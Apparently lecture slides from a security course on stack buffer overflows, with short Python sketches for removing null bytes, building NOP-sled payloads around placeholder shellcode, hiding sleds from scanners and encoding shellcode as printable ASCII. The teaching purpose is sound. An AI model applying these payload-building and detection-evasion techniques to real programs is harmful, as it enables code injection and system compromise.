Week 2: Buffer Overflow Part 2
Outline
- Buffer overflow techniques (continued)
  - Assuming the stack is executable, we can also insert code on the stack
- Shellcode development (0x510 - 0x530)
What We Can Do So Far
If there is a vulnerable buffer that can be overflowed, then we can:
- Change variables by overflowing them, as long as
  - they are located after the vulnerable buffer in memory
  - their values are not overwritten again after the vulnerable function call (such as strcpy and similar functions)
- Change the control flow by overwriting the return address on the stack
  - We can call a sequence of functions in the program file
  - Ret2libc (0x6b0)
  - Return-oriented programming (ROP)
However, we cannot inject new instructions
Buffer Overflow Example
Code Injection via Executable Stack
- If the stack is executable, we can also inject instructions onto the stack by overflowing the buffer and then changing the return address to point inside the overflowed buffer
- There is one problem we need to solve
  - First, we need to write suitable instructions
Shellcode Development
- Code that is injected as part of a string has some additional requirements
  - Can it contain calls to specific addresses?
  - Can it contain instructions where some bytes are zero?
- In general, the injected code should be as short as possible, because the space is often limited
A Simple Assembly Program
Problems to Be Solved
- We cannot have a separate data segment
- How can we define and use data then?
  - Use a call instruction and place the data right after it: call pushes the address of the next byte (the start of the data) onto the stack as its return address
  - Use the stack
Call Instructions in x86
A Version with No Data Segment
A Version with No Data Segment
- For example, the program can be assembled into machine code using “nasm helloworld1.s”
A Version with No Data Segment – cont.
A Version with No Data Segment – cont.
- Can we inject the code by overflowing a string buffer?
- No. String functions such as strcpy stop copying at the first null byte, and the code contains null bytes.
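To make the problem concrete, here is a minimal sketch that simulates what a strcpy-style copy does to machine code containing null bytes. The sample bytes are an assumption for illustration: they are the standard 32-bit encodings of mov eax, 4 and mov ebx, 1, not necessarily the instructions of the program on the slide, and the helper names are hypothetical.

```python
def null_offsets(code: bytes) -> list:
    """Return the offsets of every 0x00 byte in the machine code."""
    return [i for i, b in enumerate(code) if b == 0]


def strcpy_view(code: bytes) -> bytes:
    """Return what a C string copy would transfer: everything before the first null."""
    return code.split(b"\x00", 1)[0]


# Assumed sample: mov eax, 4 (b8 04 00 00 00) followed by mov ebx, 1 (bb 01 00 00 00).
sample = bytes.fromhex("b804000000" "bb01000000")

print("null bytes at offsets:", null_offsets(sample))
print("bytes that survive the copy:", strcpy_view(sample).hex())
```

Only the first two bytes would reach the target buffer, so the injected code would be cut off in the middle of its first instruction.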
A Version with No Data Segment – cont.
- How can we remove the null bytes?
- We can remove the first one by using a jump forward and a call backward. Why will it work?
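One way to see why the backward call helps: call takes a signed 32-bit displacement relative to the next instruction, so a small forward distance is padded with 0x00 bytes while a small backward distance is padded with 0xff bytes. The sketch below encodes both cases; the distances 13 and -27 are made-up values for illustration. The short jump that precedes the call uses a one-byte displacement, so it adds no null bytes either.

```python
import struct


def encode_call(rel: int) -> bytes:
    """Encode x86 `call rel32`: opcode 0xE8 plus a signed 32-bit little-endian displacement."""
    return b"\xe8" + struct.pack("<i", rel)


forward = encode_call(13)    # call forward over 13 bytes of data (hypothetical distance)
backward = encode_call(-27)  # call backward by 27 bytes (hypothetical distance)

print(forward.hex(), "contains null:", 0 in forward)
print(backward.hex(), "contains null:", 0 in backward)
```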
Removing Null Bytes
Removing Null Bytes – cont. How about the other null bytes?
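The remaining null bytes usually come from 32-bit immediate operands holding small values. A common fix, sketched below, is to zero the register with xor and then set only its low byte or increment it. The three rewrites are standard 32-bit encodings chosen for illustration; they are an assumption and may differ from the instructions used in the lecture's program.

```python
# (effect, encoding with nulls, null-free replacement), all standard 32-bit encodings
REWRITES = [
    ("eax = 4", "b804000000", "31c0b004"),  # mov eax, 4  ->  xor eax, eax ; mov al, 4
    ("ebx = 1", "bb01000000", "31db43"),    # mov ebx, 1  ->  xor ebx, ebx ; inc ebx
    ("edx = 0", "ba00000000", "31d2"),      # mov edx, 0  ->  xor edx, edx
]

for effect, original_hex, rewritten_hex in REWRITES:
    original = bytes.fromhex(original_hex)
    rewritten = bytes.fromhex(rewritten_hex)
    print(f"{effect}: {original_hex} ({original.count(0)} nulls, {len(original)} bytes)"
          f" -> {rewritten_hex} ({rewritten.count(0)} nulls, {len(rewritten)} bytes)")
```

The rewrites are also shorter than the originals, which helps with the limited space available for injected code.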
Removing Null Bytes – cont.
Shell-Spawning Shellcode
- How can we create a shell using a short code segment such as a shellcode?
- We used system() in libc to run another program (including a shell program such as /bin/sh)
- However, calling system() is problematic here: we do not know whether system() is available and, if it is, where it is located
Shell-Spawning Shellcode
- The system() function itself is implemented similarly to the following code segment
Shell-Spawning Shellcode
Shell-Spawning Shellcode – cont.
Testing Shellcode
- Here is a short program that can be used to test a shellcode segment
- You need to allow an executable stack
- Example compiler options: gcc -z execstack -m32 -g -o sc2 sc2.c
Injecting Shellcode Using the Example
Overflowing the Return Address
- We need to overwrite the return address with the address of the beginning of the shellcode
- In this example we know the exact layout of the stack, so this is not a problem
- In a real-world situation this is no longer the case, and we have to figure out the correct address
  - We can do it by trial and error
- Is there a way to improve the chance of success or reduce the number of trials needed?
Overflowing the Return Address
There are two techniques that can be used to reduce the number of trials:
- We can repeat the address a number of times
  - If one of the copies overwrites the return address, we will be fine
- We can also insert instructions that do not affect the execution at the beginning of the code, so that it works properly as long as we return to any one of these “NOP” instructions
Overflowing the Return Address A typical shell code will have the following form
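The two techniques combine into the usual layout of a NOP sled, then the shellcode, then the guessed address repeated several times. Below is a minimal sketch of that layout. The function name, the placeholder shellcode (eight int3 bytes) and the address 0xbffff6c0 are all hypothetical values chosen for illustration.

```python
import struct


def build_payload(shellcode: bytes, ret_addr: int, sled_len: int, addr_copies: int) -> bytes:
    """Lay out: NOP sled | shellcode | guessed return address repeated addr_copies times."""
    sled = b"\x90" * sled_len                # returning anywhere in the sled slides into the shellcode
    addr = struct.pack("<I", ret_addr)       # x86 stores addresses in little-endian order
    payload = sled + shellcode + addr * addr_copies
    if b"\x00" in payload:
        raise ValueError("payload contains a null byte and would be cut short by strcpy")
    return payload


placeholder_shellcode = b"\xcc" * 8          # stand-in bytes (int3), not a real shellcode
payload = build_payload(placeholder_shellcode, 0xBFFFF6C0, sled_len=16, addr_copies=4)
print(payload.hex())
```

For the repeated address to land exactly on the saved return address, the copies have to line up with it on a 4-byte boundary, so the sled length is usually adjusted until the combined length of sled and shellcode gives the right alignment.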
Overflowing the Return Address
- On x86, the single byte 0x90 is a NOP instruction; it is the encoding of xchg eax, eax, which has no effect
- However, malware scanners and other detectors are designed to look for repeated NOP instructions as a sign of code injection
- Can we improve? How?
Hiding the Sled Since we zero out the registers at the beginning of shellcode, we can use combinations of the following opcodes (or instructions)
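A sketch of one such sled follows, assuming the candidate opcodes are the single-byte inc and dec instructions on eax, ebx, ecx and edx (this choice is an assumption). These bytes are printable ASCII letters, so a random mix of them looks like text rather than a run of 0x90. The encodings are valid only in 32-bit mode; in 64-bit mode the bytes 0x40 to 0x4f are instruction prefixes instead.

```python
import random

# Single-byte inc/dec instructions in 32-bit mode, keyed by opcode byte.
SLED_OPCODES = {
    0x40: "inc eax", 0x41: "inc ecx", 0x42: "inc edx", 0x43: "inc ebx",
    0x48: "dec eax", 0x49: "dec ecx", 0x4A: "dec edx", 0x4B: "dec ebx",
}


def make_sled(length: int, seed=None) -> bytes:
    """Build a sled of random inc/dec opcodes; safe only if the shellcode resets these registers."""
    rng = random.Random(seed)
    choices = list(SLED_OPCODES)
    return bytes(rng.choice(choices) for _ in range(length))


sled = make_sled(32, seed=1)
print(sled.decode("ascii"))  # a string made of the letters @ A B C H I J K
```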
Hiding the Sled – cont.
- One can also use pairs of instructions that are equivalent to NOPs
Hiding the Sled – cont.
Approximating the Return Address
- This example is from Hacking: The Art of Exploitation (Erickson), pages 140-141.
Using the Environment
- On Linux machines without address space layout randomization, the location of the environment variables on the stack is predictable
- We can hide the shellcode in an environment variable and pass it to the program via execle
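The prediction can be sketched as simple arithmetic. The formula below assumes the classic 32-bit Linux layout with stack randomization disabled, an environment that contains only the shellcode string, and the base value 0xbffffffa used in the textbook's version of this exploit. The function name, the 35-byte length and the path "./vuln" are hypothetical.

```python
def env_shellcode_address(shellcode_len: int, program_path: str,
                          base: int = 0xBFFFFFFA) -> int:
    """Estimate where the only environment string starts on a classic 32-bit Linux stack.

    Assumed layout, from the top of the stack downward: four null bytes, the program
    path with its terminator, then the environment string with its terminator.
    """
    return base - shellcode_len - len(program_path.encode())


addr = env_shellcode_address(shellcode_len=35, program_path="./vuln")
print(hex(addr))
```

On a modern system with randomization enabled, this estimate will not hold from one run to the next.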
Printable ASCII Shellcode
- Note that strings typically consist of only printable ASCII characters
- The shellcodes we have so far may contain any byte value
Printable ASCII Shellcode
- How can we build shellcodes using only printable ASCII characters?
  - Printable ASCII characters range from 0x20 (‘ ‘, space) to 0x7e (‘~’)
  - But our shellcodes should still consist of valid x86 instructions
- What can we do?
Printable ASCII Shellcode
A small subset of x86 instructions assemble to printable bytes:
  Instruction            ASCII
  and eax, 0x454e4f4a    %JONE
  sub eax, 0x41414141    -AAAA
  push eax               P
  pop eax                X
  push esp               T
  pop esp                \
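The correspondence between these instructions and their ASCII forms can be checked by writing out the encodings. The sketch below uses the standard 32-bit opcodes (0x25 for and eax, imm32 and 0x2d for sub eax, imm32, each followed by the operand in little-endian order). Note that the string %JONE corresponds to the operand 0x454e4f4a. The helper name is hypothetical.

```python
import struct


def is_printable(code: bytes) -> bool:
    """True if every byte lies in the printable ASCII range 0x20 to 0x7e."""
    return all(0x20 <= b <= 0x7E for b in code)


ENCODINGS = {
    "and eax, 0x454e4f4a": struct.pack("<BI", 0x25, 0x454E4F4A),
    "sub eax, 0x41414141": struct.pack("<BI", 0x2D, 0x41414141),
    "push eax": b"\x50",
    "pop eax": b"\x58",
    "push esp": b"\x54",
    "pop esp": b"\x5c",
}

for asm, code in ENCODINGS.items():
    print(f"{asm:22} {code.hex():12} {code.decode('ascii')!r}")

# By contrast, xor eax, eax (31 c0) is not printable because of the 0xc0 byte.
print(is_printable(bytes.fromhex("31c0")))
```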
Printable ASCII Shellcode Can we encode the following shellcode using printable ASCII shellcode?
The Plan
- We will encode the shellcode using printable characters only
- When we execute the encoded code, it will rebuild the original shellcode on the stack
- The original shellcode will start running when the encoded code is finished
The Plan
How?
- We need to overwrite the return address so that the loader code will start executing
- We will change ESP so that it is higher than EIP
- We will then initialize EAX to zero
  - How, using printable characters only?
- We will generate the shellcode starting from its end
  - In this case, the first value will be 0x80cde190
- Then we will generate four bytes each time by subtracting printable values from EAX and pushing the result
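Both steps can be sketched in a few lines. EAX is zeroed by two and instructions whose printable operands share no set bits, and each 4-byte value is then reached with three sub instructions whose operands are printable. The solver below is one possible way to pick the operands, working byte by byte with a carry; it is an assumption for illustration, not the method used to build the loader in the lecture, and the function names are hypothetical.

```python
LO, HI = 0x21, 0x7E          # printable byte range used for operands (space excluded)
MASK = 0xFFFFFFFF


def is_printable_dword(value: int) -> bool:
    """True if all four bytes of a 32-bit value are printable."""
    return all(LO <= b <= HI for b in value.to_bytes(4, "little"))


def printable_sub_operands(start: int, target: int) -> tuple:
    """Find printable a, b, c such that (start - a - b - c) mod 2**32 == target."""
    diff = (start - target) & MASK           # a + b + c must equal this modulo 2**32
    operands = [0, 0, 0]
    carry = 0
    for i in range(4):                        # least significant byte first
        want = (diff >> (8 * i)) & 0xFF
        # Smallest sum of three printable bytes congruent to (want - carry) mod 256.
        s = 3 * LO + ((want - carry - 3 * LO) % 256)
        carry = (s + carry) >> 8              # carry into the next byte position
        x = s // 3                            # split the sum into three nearly equal bytes
        y = (s - x) // 2
        z = s - x - y
        for k, byte in enumerate((x, y, z)):
            operands[k] |= byte << (8 * i)
    return tuple(operands)


eax = 0xDEADBEEF                              # arbitrary starting value
eax &= 0x454E4F4A                             # and eax, 0x454e4f4a  ("%JONE")
eax &= 0x3A313035                             # and eax, 0x3a313035  ("%501:"); eax is now 0

a, b, c = printable_sub_operands(eax, 0x80CDE190)
result = (eax - a - b - c) & MASK
print(hex(a), hex(b), hex(c), "->", hex(result))
```

Many other operand triples give the same result, which is why the same shellcode can be encoded by many different loaders.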
The Loader
The Loader Polymorphism
- Note that there are many equivalent ways of generating the loader code for a given shellcode
  - There are many ways to zero out EAX using only printable characters
  - Given two 32-bit hexadecimal values, there are often many ways to change one into the other using “sub eax” instructions
Testing
Summary
- By exploiting a buffer overflow vulnerability on the stack, we can overwrite the return address
  - Therefore we can change the control flow
  - We may also change the values of local variables
- When the stack is executable, we can also inject (malicious) instructions on the stack
  - Such code segments must be position independent
  - They cannot contain null bytes (in the middle), so null bytes must be removed
- Such code segments are typically called shellcodes, as they often create a shell so that hackers can run commands afterwards
Citations
- Jon Erickson, Hacking: The Art of Exploitation, 2nd ed., 2008